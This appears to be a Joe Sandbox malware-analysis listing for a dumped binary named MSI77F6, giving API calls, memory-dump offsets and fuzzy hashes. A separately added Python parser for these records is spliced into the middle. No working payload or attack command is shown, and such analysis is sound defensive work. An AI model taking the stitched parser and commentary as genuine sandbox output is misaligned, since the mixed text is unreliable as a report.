                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction ID: 59451574243d92a3b29e3968b442ddc9793a7b9bf73ba18c06e82c2f903fc492
                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                        • Instruction Fuzzy Hash: EB114976600605DFCB24DF28E481916B7F9FF49360B20C82EE88ECB661E736E841CB50
                                        APIs
                                          • Part of subcall function 00773F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00773F90
                                          • Part of subcall function 00794129: __wfsopen.LIBCMT ref: 00794134
                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007734E2,?,00000001), ref: 00773FCD
                                          • Part of subcall function 00773E78: FreeLibrary.KERNEL32(00000000), ref: 00773EAB
                                          • Part of subcall function 00774010: _memmove.LIBCMT ref: 0077405A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Library$Free$Load__wfsopen_memmove
                                        • String ID:
                                        • API String ID: 1396898556-0
                                        • Opcode ID: 7a38eb5df890c3de767d4d0ebd098a2470b0549d934461a1864eac5d875e6dd1
                                        • Instruction ID: f6da697dcd8b281c5f92f47d537908814d9968fdfdc7ef3dd98b87d3be96b9eb
                                        • Opcode Fuzzy Hash: 7a38eb5df890c3de767d4d0ebd098a2470b0549d934461a1864eac5d875e6dd1
                                        • Instruction Fuzzy Hash: EF11A731600209EACF10BB64DC0AF9D77A5AF50780F10C829F545E7191DBBC9E45E750
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 1144bc1bee5022546c0b63715fc1374cb307be0ab8b28e2197dda4f978c8c466
                                        • Instruction ID: 9ea5694a1c3e8761392f59b5d42d6f536b4df3cb92c71d9b39e595ae8ba3c85c
                                        • Opcode Fuzzy Hash: 1144bc1bee5022546c0b63715fc1374cb307be0ab8b28e2197dda4f978c8c466
                                        • Instruction Fuzzy Hash: 3C213970548641CFEB24EF65C448B2ABBE1BF89344F15496CE99547322C339F899CF92
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: bd3f07c856bfe139f22b3bfc26e846088edfcf0f0a990b480d32312e14543d26
                                        • Instruction ID: 1e18efb894e4042478b9852e2af528d2c54537f7184acc61d3bffc566eaa9b5d
                                        • Opcode Fuzzy Hash: bd3f07c856bfe139f22b3bfc26e846088edfcf0f0a990b480d32312e14543d26
                                        • Instruction Fuzzy Hash: 5F11BC36201219EFDB10DF48C880A9A77F9BF49720B05816AED498B311DB39AD41CB91
                                        APIs
                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00774E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00774CF7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: ed0fcc7a24a49d53ae40df1a63469cb0e09d24a2a6c8e06898c0738a67ba9adf
                                        • Instruction ID: 00a245c81936cd3026c9a66904ab0ef91cf27149988b029ecd99210e3b1e5974
                                        • Opcode Fuzzy Hash: ed0fcc7a24a49d53ae40df1a63469cb0e09d24a2a6c8e06898c0738a67ba9adf
                                        • Instruction Fuzzy Hash: 57115731201B049FDB31CF1AC880F66B7E9AF44394F10C81EE6AA86A50C7B9E844CB60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction ID: ccc5ca37e085ce4d84a22699bc93753c4116b833f87e6e83cb707b14cb77391f
                                        • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                        • Instruction Fuzzy Hash: F1017CB5201542AFD705AB29C885D39F7AAFF8A3507148159E969C7702CB34AC22CBE1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction ID: 43abe2c830121bbe67225c2a6d4437968fee0ec31e39e44873029b1dc00e6b4f
                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction Fuzzy Hash: DF014EB1210701AED7159B38D807E26BBA8DF083A0F50C52EF55DCB1D0EB75E4008790
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction ID: e64208af6c6004ecd7cf815bcc910c9c4a520110ae444b4a84a33f43cb5b844a
                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction Fuzzy Hash: 6C01D631144A05EBCB30BF29E849A5ABBA8AF81360B20853DF85887651DB39A85187A1
                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 007C95C9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: 60faf1a11bea3f258fd14d61cc44c871fa37d3866aef016a8a0538d7668ce02f
                                        • Instruction ID: 17f36d805e10ac61d0e2e2e6b4426d73910460838f78d6a4c080c28c14471f88
                                        • Opcode Fuzzy Hash: 60faf1a11bea3f258fd14d61cc44c871fa37d3866aef016a8a0538d7668ce02f
                                        • Instruction Fuzzy Hash: 38E065776042146BC320EA64DC45AABB799BF85730F14875AFDA48B2C1EB34DD14C7D1
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,007734E2,?,00000001), ref: 00773E6D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 7c291a5cea1aee3b57624b9e3b114c0e576e9973db6b19d0c31e5f697a00e285
                                        • Instruction ID: b1c713369bf3f85905f133c5498f2dab3d7f5c0d02dbd032b4ba93ddee8a2048
                                        • Opcode Fuzzy Hash: 7c291a5cea1aee3b57624b9e3b114c0e576e9973db6b19d0c31e5f697a00e285
                                        • Instruction Fuzzy Hash: 71F03971201751CFCF349F64D894826BBE1BF04759324CA3EE1DA82621C7B9A944EF00
                                        APIs
                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 007B7A11
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FolderPath_memmove
                                        • String ID:
                                        • API String ID: 3334745507-0
                                        • Opcode ID: ea20bf38d7133ad66c35aa28141b7e5717329f609f2c804bd217ae4b3039016e
                                        • Instruction ID: b7683de0c7f65368e63f273848bd310b0ddc32f0cdfd2ee7b261cacd93f2ae7a
                                        • Opcode Fuzzy Hash: ea20bf38d7133ad66c35aa28141b7e5717329f609f2c804bd217ae4b3039016e
                                        • Instruction Fuzzy Hash: 2AD05EA66002286FDB64E6249C0DDFB37ADD744144F0042A0786DD2042E964AE4586E0
                                        APIs
                                          • Part of subcall function 007B6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,007B685E,?,?,?,007E4A5C,0080E448,00000003,?,?), ref: 007B66E2
                                        • WriteFile.KERNEL32(?,?,008322E8,00000000,00000000,?,?,?,007E4A5C,0080E448,00000003,?,?,00774C44,?,?), ref: 007B686C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$PointerWrite
                                        • String ID:
                                        • API String ID: 539440098-0
                                        • Opcode ID: 0dee69c92b93c0990fa018fde9d4043b1a2bc38cc51deedee4b633bfa84d28d7
                                        • Instruction ID: de3b9f488007b4ef08916b60b5160e96d90b7ccababdf46102c1d883860a84d3
                                        • Opcode Fuzzy Hash: 0dee69c92b93c0990fa018fde9d4043b1a2bc38cc51deedee4b633bfa84d28d7
                                        • Instruction Fuzzy Hash: 4AE0B636400218FBDB20AF94D805BDABBB9EB04354F10451AF94195151D7B9AE14DBA5
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00771952
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSendTimeout
                                        • String ID:
                                        • API String ID: 1599653421-0
                                        • Opcode ID: b1e7fef3e539cc121f1c2e97615e94c11cc2b098d42f978fc9ec1ebb8621f44f
                                        • Instruction ID: c012664cddfa586b7126b3e7fab1ffbb8d00e5ed1427215311ed5551789e1489
                                        • Opcode Fuzzy Hash: b1e7fef3e539cc121f1c2e97615e94c11cc2b098d42f978fc9ec1ebb8621f44f
                                        • Instruction Fuzzy Hash: DFD012F16902087EFB008761CD07EBB775CD721F81F0086617E06D64D1D6649E098574
                                        APIs
                                          • Part of subcall function 0077193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00771952
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AE3AA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID:
                                        • API String ID: 1777923405-0
                                        • Opcode ID: 6e119d3da5c0ff70bd1208a2cb4898e673455a94d80f4154ac261a68b94530ef
                                        • Instruction ID: 3cef98bd5ad73879f402b8ea007f63471cc778057757da1c0833a747bc4dda7b
                                        • Opcode Fuzzy Hash: 6e119d3da5c0ff70bd1208a2cb4898e673455a94d80f4154ac261a68b94530ef
                                        • Instruction Fuzzy Hash: 6BD01231144150EAFE706B18FC06FD577A29B41790F118559B580AB0E5C6D65C419644
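The function records in this listing (an "APIs" list with call-site addresses, the memory-dump source and offset, and the Similarity hashes) are what a triage script consumes when it wants, for instance, every call site of WriteFile or WSAStartup across the dumped image, or a lookup table keyed on the instruction fuzzy hash. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It assumes only what the listing shows: a record starts at each "APIs" header, API lines carry either `Name.MODULE(args), ref: addr` or the `Part of subcall function addr:` prefix, and the other sections are `key: value` bullets. `SAMPLE` is a constructed two-record excerpt copied in the report's layout with the associated-dump list shortened.

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Memory Dump Source" /
"Similarity" blocks) into structured data for triage scripting.
Added example; not Joe Sandbox code."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# One API line, e.g.
#   • WriteFile.KERNEL32(?,?,008322E8,...), ref: 007B686C
#   • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when reported as "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)      # Snapshot File, API ID, hashes, ...
    associated: list = field(default_factory=list)  # associated .sdmp dumps


def parse_records(text: str) -> list:
    """Split the listing into records; a new record starts at every 'APIs' header."""
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            if line == "APIs":
                records.append(FunctionRecord())
            continue
        if not records:
            continue
        rec = records[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                rec.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                         int(m["sub"], 16) if m["sub"] else None))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Associated":
            # drop the "Download File" link label left over from the HTML page
            rec.associated.append(val.removesuffix("Download File").strip())
        else:
            rec.fields[key] = val
    return records


def dump_base(rec: FunctionRecord) -> Optional[int]:
    """Load address of the dump the record came from ('Offset:' in the Source File line)."""
    m = re.search(r"Offset:\s*([0-9A-Fa-f]{8})", rec.fields.get("Source File", ""))
    return int(m.group(1), 16) if m else None


def direct_api_counts(records) -> Counter:
    """Count APIs called directly by the dumped functions (subcall entries excluded)."""
    return Counter(f"{c.name}.{c.module}" for r in records for c in r.calls
                   if c.subcall_of is None)


def call_sites(records, api_name: str) -> list:
    """Sorted call-site addresses of api_name, whether direct or inside a subcall."""
    return sorted({c.ref for r in records for c in r.calls if c.name == api_name})


# Constructed sample: two records in the report's layout (associated-dump list shortened).
SAMPLE = """
APIs
  • Part of subcall function 007B6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,007B685E,?,?,?,007E4A5C,0080E448,00000003,?,?), ref: 007B66E2
• WriteFile.KERNEL32(?,?,008322E8,00000000,00000000,?,?,?,007E4A5C,0080E448,00000003,?,?,00774C44,?,?), ref: 007B686C
Memory Dump Source
• Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Instruction Fuzzy Hash: 4AE0B636400218FBDB20AF94D805BDABBB9EB04354F10451AF94195151D7B9AE14DBA5
APIs
  • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
• SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 007B7A11
Memory Dump Source
• Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
Similarity
• API ID: FolderPath_memmove
• API String ID: 3334745507-0
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.fields.get("API ID"), [f"{c.name}@{c.ref:08X}" for c in r.calls])
    print(direct_api_counts(recs), call_sites(recs, "SetFilePointerEx"))
```

Subcall entries are kept on the record but excluded from `direct_api_counts` so that a helper such as `_memmove` or `SetFilePointerEx` reached through a callee is not double-counted against the function that merely calls that callee; `call_sites` includes them, because for cross-referencing a disassembly the call-site address is what matters regardless of which function the report attributes it to.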
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: TextWindow
                                        • String ID:
                                        • API String ID: 530164218-0
                                        • Opcode ID: d36f5c35c18a4d35cf0cf8dd4392a8213c0639b014ba0d37775b8edb840f9b14
                                        • Instruction ID: c6f695aee2a01b406c0d360b38b623cd749dd7bc6e2edc705858dda4f8a8da28
                                        • Opcode Fuzzy Hash: d36f5c35c18a4d35cf0cf8dd4392a8213c0639b014ba0d37775b8edb840f9b14
